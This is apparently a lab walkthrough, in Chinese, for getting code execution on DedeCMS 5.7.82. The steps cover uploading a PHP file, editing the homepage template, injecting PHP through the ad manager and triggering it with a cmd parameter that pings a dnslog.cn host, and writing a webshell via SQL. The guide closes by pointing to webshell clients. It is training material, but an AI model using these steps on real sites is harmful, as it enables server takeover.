DeDeCMS靶场攻略

文件管理器

点击模块,选择上传文件

在电脑中新建2.php

<?php phpinfo();?>

访问2.php,验证是否成功

修改模板文件

在模块中找到index.htm

在index.htm加上<?php phpinfo();?>

点击生成->更新主页HTML,将index.html改为index.php

访问index.php,验证是否成功

后台任意命令执行

点击广告管理->增加广告

<?php phpinfo();?>

点击[代码]

得到地址

访问地址,无回显

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1

在dnslog.cn上获得一个网址

再次访问,这样若成功将木马植入的话dnslog会显示访问记录

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn

后台sql命令执行

尝试查询basedir

在得到的目录下写入木马文件

访问后得到12.php

这些成功后可以用蚁剑,caidao连接

相关推荐
uwvwko5 小时前
BUUCTF——web刷题第一页题解
android·前端·数据库·php·web·ctf
fzxwl5 小时前
隆重推荐(Android 和 iOS)UI 自动化工具—Maestro
android·ui·ios
LittleLoveBoy8 小时前
踩坑:uiautomatorviewer.bat 打不开
android
居然是阿宋8 小时前
Android核心系统服务:AMS、WMS、PMS 与 system_server 进程解析
android
CGG9211 小时前
【单例模式】
android·java·单例模式
kp0000011 小时前
PHP弱类型安全漏洞解析与防范指南
android·开发语言·安全·web安全·php·漏洞
编程乐学(Arfan开发工程师)16 小时前
06、基础入门-SpringBoot-依赖管理特性
android·spring boot·后端
androidwork17 小时前
使用 Kotlin 和 Jetpack Compose 开发 Wear OS 应用的完整指南
android·kotlin
繁依Fanyi18 小时前
Animaster:一次由 CodeBuddy 主导的 CSS 动画编辑器诞生记
android·前端·css·编辑器·codebuddy首席试玩官
奔跑吧 android20 小时前
【android bluetooth 框架分析 02】【Module详解 6】【StorageModule 模块介绍】
android·bluetooth·bt·aosp13·storagemodule